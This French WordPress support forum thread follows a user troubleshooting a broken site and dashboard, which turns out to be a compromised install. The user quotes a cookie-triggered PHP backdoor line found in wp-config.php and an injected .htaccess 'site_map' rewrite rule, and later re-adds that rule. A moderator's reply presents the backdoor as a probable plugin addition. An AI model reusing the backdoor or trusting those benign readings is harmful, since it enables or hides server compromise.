Problème d’affichage et Tableau de bord inaccessible (Créer un compte)

  • WordPress :4.8.1
  • Statut : non résolu
  • Ce sujet contient 15 réponses, 5 participants et a été mis à jour pour la dernière fois par Flobogo, le il y a 44 minutes.
15 sujets de 1 à 15 (sur un total de 16)
  • Auteur
    Messages
  • #2360131
    JakIch
    Participant
    Initié WordPress
    6 contributions

    Ma configuration WP actuelle

    • Version de PHP/MySQL : 5.6
    • Thème utilisé : Baskerville
    • Extensions en place : Akismet, Classic Editor, Latest Posts, Menu Image, Simple Lightbox, Siteorigin Panels, So Widgets Bundle, WordPress SEO, WP File Manager, WP Spamshield
    • Nom de l’hébergeur : OVH
    • Adresse du site : http://www.oeildepopo.fr

    Problème(s) rencontré(s) :

    Bonjour à tous !

    J’ai un problème assez bizarre, je fais des recherches depuis quelques jours pour essayer de le résoudre mais rien à faire, je ne trouve pas de cas similaire sur les forums.

    J’ai deux sites hébergé chez OVH avec une offre multisite, un qui fonctionne parfaitement et l’autre (cité au-dessus) qui a des soucis d’affichage et dont je ne peux plus accéder au tableau de bord WordPress. En gros :

    Ce sont des sites que je ne visite pas régulièrement donc je ne sais pas depuis quand le problème est présent mais la dernière fois que je me suis rendu sur le site en question c’était en juillet et tout fonctionnait sans soucis.

    Je ne pense pas que ce soit un soucis avec mon theme. J’imagine que l’interface WordPress pour se connecter au tableau de bord resterait accessible sinon. Je ne pense pas non plus que ce soit un problème avec mon hébergeur étant donné que mon autre site n’a pas ces soucis (ils sont sur la même offre d’hébergement). Je pense que le problème vient de WordPress, j’ai l’impression que ce ne sont que les adresses de mon WordPress qui ne se chargent pas (wp-login, wp-content, etc…).

    J’ai essayé de restaurer une ancienne base de donnée mais les plus vieilles que j’ai remontent à un mois maximum et je ne sais pas si le problème était déjà présent à ce moment-là. Ça n’a rien changé. J’ai pensé aussi que le problème pouvait venir des mises à jour automatiques de WordPress, j’ai essayé de revenir sur une version antérieure à juin 2020, mais les problèmes persistent. J’ai également désactivé tous les plugins à chaque fois.

    Bref, je suis perdu… Si quelqu’un a une piste, je vous en remercie d’avance.

    #2360160
    pasglop
    Participant
    Chevalier WordPress
    154 contributions

    Bonjour,

     

    Votre version de WP n’est, apparemment, pas du tout à jour (4.7.18, on en est à la 5.5.3). Votre version de PHP non plus (5.6, OVH en est à la 7.x). Qu’en est-il du thème ? Et des extensions, surtout si vous aviez activé les mises à jour automatique…?

    #2360194
    JakIch
    Participant
    Initié WordPress
    6 contributions

    Non, en effet, la version de WordPress n’était pas à jour. J’ai essayé de revenir sur une version antérieure pour voir si ça résolvait le problème. Je viens de mettre à jour le site manuellement vers WordPress 5.5.3 en passant par le serveur FTP, mais ça n’a pas l’air d’avoir bougé.

    J’attendais d’avoir retrouvé une configuration stable pour pouvoir faire une sauvegarde “propre” de mes sites avant le passage en PHP 7.3, mais je viens de m’en occuper. Mon hébergement est maintenant en PHP 7.3 et les problèmes persistent.

    Pour le theme, j’avoue avoir travaillé comme un cochon et d’avoir modifié directement dans son code. Du coup j’ai peur de perdre toutes mes modifications si je le mets à jour.

    Pour ce qui est des extensions, il me semble que je les mettais à jour à chaque connexion sur le site. Dans tous les cas, elles sont toutes désactivées actuellement.

    #2360209
    ferman
    Participant
    Maître WordPress
    3222 contributions

    Bonjour,

    Si vous n’avez pas mis votre thème à jour depuis longtemps et si en plus vous l’avez modifié, il risque de ne pas être compatible avec les dernières versions de wordpress. Quand on charge une page du site on voit une série d’erreurs js dans la console (fichiers manquants). On voit la même chose sur Sucuri.  Beaucoup se rapportent au thème et aux images. Avez vous regardé ce qu’il se passe avec un thème par défaut? Vous pourriez aussi télécharger ce plugin: Si votre version de jQuery est obsolète (c’est possible faute de mises à jour du thème) ça pourrait être utile.

    Mais d’abord je regarderais avec un thème par défaut.

    • Cette réponse a été modifiée le il y a 4 jours et 6 heures par ferman.
    • Cette réponse a été modifiée le il y a 4 jours et 6 heures par ferman.
    #2360213
    JakIch
    Participant
    Initié WordPress
    6 contributions

    Je viens de changer pour le thème twentytwenty (mis à jour avec la dernière version de WordPress). On voit bien qu’il y a un changement de thème sur la police utilisée, la couleur et la disposition du site, mais malheureusement le soucis est toujours présent.

    Je voulais regarder pour installer le plugin mais je ne crois pas avoir la possibilité de l’activer.
    Une fois installé via FTP, est-ce qu’il est possible d’activer un plugin sans avoir accès à son tableau de bord ?

    En tout cas, merci beaucoup pour votre aide jusque là !

    #2360214
    C_Lucien
    Modérateur
    Maître WordPress
    4445 contributions

    Bonjour,


    @jakich

    Vous pouvez créer un thème enfant et y recopier vos modifications du thème parent. Ce ne sera pas optimisé (code dupliqué), mais apporte une certaine sécurité à cette étape.

    Ensuite seulement, vous ferez la mise à jour du thème parent –pour voir. Baskerville est toujours maintenu, c’est bon signe à priori.

    #2360221
    ferman
    Participant
    Maître WordPress
    3222 contributions

    Une fois installé via FTP, est-ce qu’il est possible d’activer un plugin sans avoir accès à son tableau de bord ?

    Oui, c’est possible mais comme le problème persiste après avoir désactivé toutes vos extensions et mis un thème par défaut, ça dépasse sans doute un problème de jQuery. Savez-vous aller dans votre base de données? Si oui, allez dans la table wp_options, cherchez la ligne “active_plugins” dans la colonne “option_name” (ça doit être vers les option_id 30 à 40). La case juste à côté (option_value ) doit être vide ou seulement contenir quelque chose comme a:0:{i:0} (c’est pour être bien sûr qu’aucun plugin n’est activé).  Que voyez-vous?

    • Cette réponse a été modifiée le il y a 4 jours et 4 heures par ferman.
    #2360225
    JakIch
    Participant
    Initié WordPress
    6 contributions

    J’avais suivi des explications qui montraient comment désactiver ses plugins sans avoir accès à son tableau de bord (juste en renommant le dossier “plugin” sur son serveur FTP), du coup ils étaient toujours tous notés comme actifs sur la base de donnée.

    Je viens de modifier le champ de la colonne “option_name” pour “a:0:{i:0}”. Je ne vois pas de changement sur le site, je ne pense pas que le soucis vienne de là malheureusement…


    @C_Lucien

    Merci pour la technique des thèmes enfants. Je ferai ça pour pouvoir faire les mises à jour et éviter les soucis à l’avenir !

    • Cette réponse a été modifiée le il y a 4 jours et 4 heures par JakIch.
    #2360240
    ferman
    Participant
    Maître WordPress
    3222 contributions

    C’est compliqué: vous avez pratiquement fait le tour de ce qu’on peut faire: passer sur un thème par défaut, désactivé les extensions, fait une mise à jour manuelle de wordpress. Avez-vous regardé dans .htaccess sinon faites-le et enlevez tout ce qui est en dehors des balises #BEGIN wordpress et #END wordpress. Sinon, je ne vois pas et comme vous n’avez pas de sauvegarde. Si c’était moi, je verrais un professionnel. Attendez d’autres avis.

     

    #2360247
    C_Lucien
    Modérateur
    Maître WordPress
    4445 contributions

    Bonjour,

    pour moi, le site s’affiche en vrac, pas de style, pas d’images, liens inopérants. Affichez les outils de développeur de votre navigateur pour fouiller la structure du site.

    Je ne suis pas expert, mais j’ai des doutes. Êtes-vous certain de n’avoir modifié que le code du thème et pas des fichiers du cœur de WordPress ?

    Faites analyser votre site par https://sitecheck.sucuri.net/ : plusieurs scripts sont inaccessibles. ???

    #2360255
    ferman
    Participant
    Maître WordPress
    3222 contributions

    Bonjour,

    Voici une série de choses proposées par un collègue et qui n’ont pas encore été essayées.

    • Renommer le dossier plugins en plugins-old:  (fait)
    • Créer un dossier plugins sans rien dedans:
    • Déplacer les thèmes dans un dossier _old sauf twenty-twenty (donc seulement twenty-twenty dans le dossier theme)
    • Vérifier que le fichier wp-config.php est propre (commenter ce qui a été ajouté eventuellement)
    • Vérifier que le fichier htaccess est propre (déjà fait à priori)?

    Pour activer le thème twenty-twenty, je pense que vous avez fait ça dans la base de données?

    • Cette réponse a été modifiée le il y a 3 jours et 12 heures par C_Lucien. Raison: suppression de balises html
    #2360298
    JakIch
    Participant
    Initié WordPress
    6 contributions

    [EDIT] J’étais en train d’écrire mon message en même temps que je bidouillais les fichiers et le problème semble résolu. Je pense qu’il s’agissait d’un soucis avec le fichier “.htaccess”. Je poste tout de même le message initial pour répondre dans le détail.

    Bonjour !

    pour moi, le site s’affiche en vrac, pas de style, pas d’images, liens inopérants. Affichez les outils de développeur de votre navigateur pour fouiller la structure du site.

    Je vois qu’il y a 154 avertissements dans la Console qui concernent plein d’éléments du site, mais je vous avoue qu’à part 2~3 lignes que j’ai pu changer pour modifier le visuel du site, je n’y comprends pas grand chose…

    Je ne suis pas expert, mais j’ai des doutes. Êtes-vous certain de n’avoir modifié que le code du thème et pas des fichiers du cœur de WordPress ?

    J’en suis à peu près sûr, oui. Jusqu’à tout récemment j’avais même perdu mes accès au serveur FTP. Tout ce que j’ai pu modifier des comme fichier c’était à travers le tableau de bord WordPress. Et même si j’avais fait des erreurs en modifiant des fichiers que je n’aurais pas dû, elles devraient avoir disparues avec la mise à jour de WordPress que je viens de faire, non ?

    Par contre en voyant tous les éléments du site qui n’étaient pas à jour, je me demande si quelqu’un n’aurait pas pu s’introduire et détruire des fichiers importants… Mais encore une fois, j’imagine qu’avec toutes les manipulations effectuées suite à l’ouverture de ce thread, les fichiers ont dûs être remplacés par des fichiers sains.

    Faites analyser votre site par https://sitecheck.sucuri.net/ : plusieurs scripts sont inaccessibles. ???

    Pourtant lorsque je vais chercher les fichiers dans mon serveur FTP, ils sont tous bien présents. Cela dit, je ne trouve à chaque fois aucune mention dans le fichier texte du numéro de version indiqué après le “?”.

    Par exemple pour celui-ci qui m’affiche l’erreur “Unable to scan the page. 404 Not Found” :
    http://www.oeildepopo.fr/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.5.3

    Le fichier “mediaelement-migrate.min.js” est bien présent à l’endroit indiqué “/wp-includes/js/mediaelement/”. Mais quand je fais “afficher/éditer” pour voir ce qu’il y a dedans, je ne trouve aucun terme qui corresponde à “5.5.3” via la recherche de texte. Je ne sais pas si c’est un problème ou si ça n’a rien à voir.

    • Renommer le dossier plugins en plugins-old:
    • Créer un dossier plugins sans rien dedans:
    • Déplacer les thèmes dans un dossier _old sauf twenty-twenty (donc seulement twenty-twenty dans le dossier theme)
    • Vérifier que le fichier wp-config.php est propre (commenter ce qui a été ajouté eventuellement)
    • Vérifier que le fichier htaccess est propre ?

    Je viens d’effectuer toutes les manipulations :
    Le fichier “wp-config.php” était propre à part cette ligne qui apparaissait en tout début du fichier, juste après l’ouverture de la balise php :

    if(isset($_COOKIE["VNuiP"])){$_COOKIE["hj"]($_COOKIE["VNuiP"]);exit;}

    Je ne sais pas d’où cela vient mais je l’ai supprimé. Cela ne semble pas avoir d’incidence sur mon problème par contre.

    Le fichier “.htaccess” était propre (en dehors des balises #BEGIN wordpress et #END wordpress) du coup je l’ai laissé tel quel.

    [EDIT] Après ouverture, je trouvais tout de même le fichier “.htaccess” un peu louche. Il y avait une ligne qui se répétait pour “index.php” mais avec une syntaxe un peu différente :

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteRule . /index.php [L]
    RewriteRule ^site_map([0-9]).xml$ ?get_map=1&tml=1&ran=$1 [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>
    
    # END WordPress

    J’ai comparé le fichier avec celui que j’avais pour mon site sain, et en effet il était différent :

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /wordpress/
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /wordpress/index.php [L]
    </IfModule>
    
    # END WordPress

    Du coup j’ai tenté de remplacer le fichier “.htaccess” de mon site à problème par celui de mon site sain et tout semble refonctionner : l’affichage normal avec les différents médias et l’accès au tableau de bord.

    Je ne sais pas à quoi correspondent ces changements dans le fichier “.htaccess” (notamment cette ligne avec “site_map” ???), ni comment ils ont pu avoir lieu (je ne pense vraiment pas y avoir touché), mais le problème semble venir de là.

     

    Je vous remercie tous encore une fois pour votre disponibilité et votre aide !
    Merci beaucoup !

    #2360301
    C_Lucien
    Modérateur
    Maître WordPress
    4445 contributions

    Tant mieux si vous vous êtes sorti.

    La ligne commençant par if(isset($_COOKIE n’existe pas dans une installation fraiche de WordPress. Elle a probablement été ajoutée par une extension.

    Le fichier .htaccess qui fonctionne montre que vous avez installé les fichiers de vos deux sites dans un sous-dossier nommé /wordpress/.

    C’est le sens de la ligne rewrite base

    #2360308
    ferman
    Participant
    Maître WordPress
    3222 contributions

    Merci pour l’explication détaillée. Je n’aurais pas imaginé que  le  htaccess à l’intérieur des balises wordpress puisse être modifié de la sorte et surtout sans intervention humaine apparente! Un coup de Goku Black?

    • Cette réponse a été modifiée le il y a 3 jours et 3 heures par ferman.
    #2360506
    JakIch
    Participant
    Initié WordPress
    6 contributions

    Bonjour !

    Le fichier .htaccess qui fonctionne montre que vous avez installé les fichiers de vos deux sites dans un sous-dossier nommé /wordpress/.

    C’est le sens de la ligne rewrite base

    Je vois, c’est sans doute juste de cette ligne que venait le problème. Au final le site semblait avoir des Internal Server Error sans la ligne “site_map”, j’ai dû la rajouter pour que le site refonctionne réellement.

    Merci pour l’explication détaillée. Je n’aurais pas imaginé que le htaccess à l’intérieur des balises wordpress puisse être modifié de la sorte et surtout sans intervention humaine apparente! Un coup de Goku Black?

    Hahaha !

    Je ne sais pas non plus mais il semblerait qu’il y ait eu une intrusion sur le site. J’ai retrouvé beaucoup de fichiers au nom douteux, en fouillant dans l’un d’eux j’ai retrouvé la signature du groupe “Anonymous Fox” qui semblent être des hackers, et en faisant une analyse avec le plugin Sucuri j’ai vu que des fichiers du cœur de WordPress ont été modifiés.

    J’essaie maintenant de me débarrasser de tout ça pour repartir sur de bonnes bases…

15 sujets de 1 à 15 (sur un total de 16)
  • Vous devez être connecté pour répondre à ce sujet.